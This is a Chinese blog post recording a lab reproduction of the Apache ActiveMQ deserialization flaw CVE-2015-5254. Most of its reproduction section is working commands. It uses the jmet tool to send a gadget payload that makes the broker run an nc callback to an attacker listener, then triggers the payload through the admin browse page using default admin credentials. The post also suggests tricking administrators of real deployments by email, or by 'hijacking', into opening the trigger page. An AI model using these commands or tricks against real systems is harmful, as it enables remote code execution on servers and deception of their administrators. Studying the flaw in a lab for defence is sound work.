Please enable Javascript to view the contents

ActiveMQ 反序列化漏洞(CVE-2015-5254)练习记录

 ·  ☕ 1 分钟  ·  ✍️ IceKam · 👀... 阅读

简介

Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。

Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。

而在某些环境当中这个中间件还是有一定的使用量的。

流程

1.使用jmet生成payload并发送。

2.访问web管理页面,触发漏洞。

复现

下载jmet

1
wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar

开启nc监听

1
nc -nvlp 8143

执行并监听

1
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "nc 172.17.0.1 8143" -Yp ROME 127.0.0.1 61616

触发漏洞

访问http://127.0.0.1:8161/admin/browse.jsp?JMSDestination=event 后查看nc是否链接成功。

测试环境帐号密码均为admin

如果是实战环境可以发个email什么的给管理员,或者劫持什么的,更多方法大家可以灵活实验。

总结

可以多试试,还有很多姿势。

分享
您的鼓励是我最大的动力
bitcoin QR Code

icekam
作者
IceKam
茶艺品鉴砖家,低端码字人口。